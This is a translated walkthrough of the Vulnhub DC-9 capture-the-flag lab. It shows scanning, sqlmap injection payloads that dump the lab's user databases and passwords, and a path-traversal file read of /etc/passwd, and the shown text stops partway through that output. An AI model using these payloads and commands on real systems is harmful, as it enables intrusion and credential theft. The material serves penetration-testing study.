Disclaimer
This document is for study and research only. Do not use the techniques or source code in it for any illegal purpose; any negative consequences caused by anyone are unrelated to the author.
Contents
- Disclaimer
- Preface
- 1. Environment setup
- 2. Information gathering
- 2.1 Host discovery
- 2.2 Port scan
- 2.3 Fingerprinting
- 2.4 Directory scan
- 2.4.1 Nikto directory scan
- 2.4.2 dirsearch directory scan
- 2.5 Vulnerability discovery
- 2.5.1 Page access
- 3. Penetration testing
- 3.1 SQL injection
- 3.1.1 Listing the database names
- 3.1.2 Listing the tables in each database
- 3.1.2.1 Tables in the Staff database
- 3.1.2.2 Tables in the users database
- 3.1.3 Dumping table contents
- 3.1.3.1 StaffDetails (Staff database)
- 3.1.3.2 Users (Staff database)
- 3.1.3.3 UserDetails (users database)
- 3.2 LFI
- 3.2.1 Login
- 3.2.2 File inclusion vulnerability
- 3.2.3 Port-knocking service
- 3.3 SSH
- 3.3.1 Opening SSH with nc
- 3.3.2 Port scan
- 3.3.3 hydra
- 3.3.3.1 Building the wordlists
- 3.3.3.2 Brute-forcing SSH with hydra
- 3.4 SSH logins
- 3.4.1 chandlerb
- 3.4.2 joeyt
- 3.4.3 janitor
- 3.4.4 fredf
- 3.5 Linux privilege escalation
- 3.5.1 Generating a password hash on Kali
- 3.5.2 Writing the password into /etc/passwd
- 3.5.3 Getting the flag
- 3.5.3.1 Switching to the admin user
- 3.5.3.2 Finding the flag file
- 3.5.3.3 Reading the flag file
- Summary
- References
Preface
Today's target is the DC-9 machine:
Vulnhub is a platform that provides vulnerable environments; most are ready-made virtual machine images with several vulnerabilities built in. This article walks through a penetration test of the DC-9 machine: nmap scanning, directory scanning (nikto / dirsearch / dirb), SQL injection, wfuzz brute-forcing, LFI file inclusion, SSH brute-forcing (knockd / nmap / netcat / Hydra), Linux privilege escalation (openssl) and finally reading the flag.
Description
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again.
But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
1. Environment setup
Lab information

| Official link | https://www.vulnhub.com/entry/dc-9,412/ |
|---|---|
| Release date | 29 December 2019 |
| Size | 700MB |
| Author | DCAU |
| Series | DC |
| Difficulty | ★★☆☆☆ |

For the penetration testing environment setup, see the author's earlier article; it is not repeated here:
Vulnhub lab series - DC-2: https://editor.csdn.net/md/?articleId=139026849
2. Information gathering
2.1 Host discovery
```bash
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1     00:50:56:c0:00:08       VMware, Inc.
192.168.6.2     00:50:56:f5:7b:9f       VMware, Inc.
192.168.6.145   00:0c:29:c1:5e:37       VMware, Inc.
192.168.6.254   00:50:56:e9:88:8e       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 4 responded
```
Target host information obtained:
IP address: 192.168.6.145
MAC address: 00:0c:29:c1:5e:37
2.2 Port scan
```bash
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 06:35 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:C1:5E:37 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
```
The scan shows:
Port 22: ssh (filtered)
Port 80: http
2.3 Fingerprinting
```bash
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.145
WhatWeb report for http://192.168.6.145
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.6.145
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and
	maintain an open-source HTTP server for modern operating
	systems including UNIX and Windows NT. The goal of this
	project is to provide a secure, efficient and extensible
	server that provides HTTP services in sync with the current
	HTTP standards.

	Version      : 2.4.38 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ HTML5 ]
	HTML version 5, detected by the doctype declaration

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to
	identify the operating system from the server header.

	OS           : Debian Linux
	String       : Apache/2.4.38 (Debian) (from server string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sat, 01 Jun 2024 10:39:45 GMT
	Server: Apache/2.4.38 (Debian)
	Vary: Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 402
	Connection: close
	Content-Type: text/html; charset=UTF-8
```
Result:
Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]
2.4 Directory scan
2.4.1 Nikto directory scan
```bash
┌──(root㉿kali)-[/home/kali]
└─# nikto -host 192.168.6.145
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.145
+ Target Hostname:    192.168.6.145
+ Target Port:        80
+ Start Time:         2024-06-01 06:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-06-01 06:42:21 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
2.4.2 dirsearch directory scan
```bash
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.145 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.145/_24-06-01_06-43-35.txt

Target: http://192.168.6.145/

[06:43:35] Starting:
[06:43:40] 403 -  278B  - /.ht_wsr.txt
[06:43:40] 403 -  278B  - /.htaccess.sample
[06:43:40] 403 -  278B  - /.htaccess.bak1
[06:43:40] 403 -  278B  - /.htaccess.save
[06:43:40] 403 -  278B  - /.htaccess_orig
[06:43:40] 403 -  278B  - /.htaccess_sc
[06:43:40] 403 -  278B  - /.htaccess.orig
[06:43:40] 403 -  278B  - /.htaccessBAK
[06:43:40] 403 -  278B  - /.html
[06:43:40] 403 -  278B  - /.htm
[06:43:40] 403 -  278B  - /.htaccessOLD2
[06:43:40] 403 -  278B  - /.htpasswd_test
[06:43:40] 403 -  278B  - /.htaccessOLD
[06:43:40] 403 -  278B  - /.htaccess_extra
[06:43:40] 403 -  278B  - /.htpasswds
[06:43:40] 403 -  278B  - /.httr-oauth
[06:43:42] 403 -  278B  - /.php
[06:44:07] 200 -    0B  - /config.php
[06:44:10] 301 -  312B  - /css  ->  http://192.168.6.145/css/
[06:44:23] 200 -  407B  - /includes/
[06:44:23] 301 -  317B  - /includes  ->  http://192.168.6.145/includes/
[06:44:32] 200 -  494B  - /manage.php
[06:44:54] 403 -  278B  - /server-status/
[06:44:53] 403 -  278B  - /server-status

Task Completed
```
Scan finished; key findings:
http://192.168.6.145/includes/
http://192.168.6.145/manage.php
2.5 Vulnerability discovery
2.5.1 Page access
Management page: http://192.168.6.145/manage.php
Site root: 192.168.6.145
Home page: http://192.168.6.145/index.php
display page: http://192.168.6.145/display.php
search page: http://192.168.6.145/search.php
Analysis:
On the search page, enter `' or 1=1 --+` and click Submit.
The response is as follows:
17 user records are returned, so this page (http://192.168.6.145/search.php) has a SQL injection vulnerability.
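As an added illustration (not code from the DC-9 box or from this writeup), the search above reproduced against an in-memory sqlite3 stand-in for the staff table: the first function pastes the term into the SQL text, as the vulnerable page evidently does, the second binds it as a parameter. Assumptions: the page searches on lastname, and the sample rows are constructed.

```python
"""Vulnerable vs. parameterized search over a StaffDetails-style table.

Added example, not code from the DC-9 box or this writeup. Uses an
in-memory sqlite3 database as a stand-in for Staff.StaffDetails and
the same payload that was typed into search.php.
"""
import sqlite3

# Constructed sample rows in the shape of the staff table (assumption).
STAFF = [
    (1, "marym@example.com", "Moe", "Mary", "CEO"),
    (2, "julied@example.com", "Dooley", "Julie", "Human Resources"),
    (3, "fredf@example.com", "Flintstone", "Fred", "Systems Administrator"),
    (4, "barneyr@example.com", "Rubble", "Barney", "Help Desk"),
]

PAYLOAD = "' or 1=1 --+"   # the value submitted on the search page


def make_db():
    """Create the in-memory table and load the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE StaffDetails ("
        "id INTEGER, email TEXT, lastname TEXT, firstname TEXT, position TEXT)"
    )
    db.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?, ?, ?)", STAFF)
    return db


def search_vulnerable(db, term):
    """Search by lastname with the term pasted into the SQL text.

    With PAYLOAD the statement becomes
        ... WHERE lastname = '' or 1=1 --+'
    so the quote closes the literal, `or 1=1` matches every row and the
    rest of the statement is commented out.
    """
    sql = "SELECT id, firstname, lastname FROM StaffDetails WHERE lastname = '" + term + "'"
    return db.execute(sql).fetchall()


def search_safe(db, term):
    """Same search with the term bound as a parameter: it is only ever data."""
    sql = "SELECT id, firstname, lastname FROM StaffDetails WHERE lastname = ?"
    return db.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))   # every row comes back
    print("safe      :", search_safe(db, PAYLOAD))         # no row has that lastname
```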
3. Penetration testing
3.1 SQL injection
3.1.1 Listing the database names
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:15:05 /2024-06-01/

[07:15:06] [INFO] testing connection to the target URL
[07:15:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:15:06] [INFO] testing if the target URL content is stable
[07:15:06] [INFO] target URL content is stable
[07:15:06] [INFO] testing if POST parameter 'search' is dynamic
[07:15:07] [WARNING] POST parameter 'search' does not appear to be dynamic
[07:15:07] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[07:15:07] [INFO] testing for SQL injection on POST parameter 'search'
[07:15:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:15:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:15:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:15:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:15:07] [INFO] testing 'Generic inline queries'
[07:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:15:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:15:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:18:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:18:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:18:50] [INFO] target URL appears to be UNION injectable with 6 columns
[07:18:50] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:18:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:18:53] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[07:18:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:18:53 /2024-06-01/
```
Enumeration finished; the database list is:
information_schema
Staff
users
3.1.2 Listing the tables in each database
3.1.2.1 Tables in the Staff database
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff --tables

[*] starting @ 07:31:48 /2024-06-01/

[07:31:48] [INFO] resuming back-end DBMS 'mysql'
[07:31:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:31:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:31:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[07:31:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:31:48 /2024-06-01/
```
Enumerating the Staff database gives 2 tables:
StaffDetails
Users
3.1.2.2 Tables in the users database
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users --tables

[*] starting @ 07:34:48 /2024-06-01/

[07:34:48] [INFO] resuming back-end DBMS 'mysql'
[07:34:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:34:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:34:48] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[07:34:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:34:48 /2024-06-01/
```
Enumerating the users database gives 1 table:
UserDetails
3.1.3 Dumping table contents
3.1.3.1 StaffDetails (Staff database)
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T StaffDetails --dump

[*] starting @ 07:38:15 /2024-06-01/

[07:38:16] [INFO] resuming back-end DBMS 'mysql'
[07:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:38:16] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[07:38:16] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[07:38:17] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/StaffDetails.csv'
[07:38:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:38:17 /2024-06-01/
```
The dump above (the bash code block) lists every record in the StaffDetails table of the Staff database (email, phone, lastname, firstname, position).
3.1.3.2 Users (Staff database)
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T Users --dump

[*] starting @ 07:45:38 /2024-06-01/

[07:45:38] [INFO] resuming back-end DBMS 'mysql'
[07:45:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:45:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:45:38] [INFO] fetching columns for table 'Users' in database 'Staff'
[07:45:38] [INFO] fetching entries for table 'Users' in database 'Staff'
[07:45:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:45:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapamxv6dki591911/sqlmaphashes-btocsf9y.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[07:45:44] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[07:45:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[07:45:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:45:47] [INFO] starting 8 processes
[07:46:13] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

[07:46:13] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/Users.csv'
[07:46:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:46:13 /2024-06-01/
```
The dump above (the bash code block) shows the Users table of the Staff database, which holds a single record:

| Username | Password |
|---|---|
| admin | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) |

The password is 32 characters long, so it is most likely an MD5 hash.
Looking it up on an online hash-lookup site gives the plaintext:
Password: transorbital1
3.1.3.3 UserDetails (users database)
```bash
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users -T UserDetails --dump

[*] starting @ 08:00:17 /2024-06-01/

[08:00:18] [INFO] resuming back-end DBMS 'mysql'
[08:00:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[08:00:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:00:18] [INFO] fetching columns for table 'UserDetails' in database 'users'
[08:00:18] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[08:00:18] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/users/UserDetails.csv'
[08:00:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 08:00:18 /2024-06-01/
```
Dumping the UserDetails table of the users database gives every user's username and password in clear text.
3.2 LFI
3.2.1 Login
Login page: http://192.168.6.145/manage.php
Username: admin
Password: transorbital1
3.2.2 File inclusion vulnerability
Test URL: http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/passwd
Returned data:
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
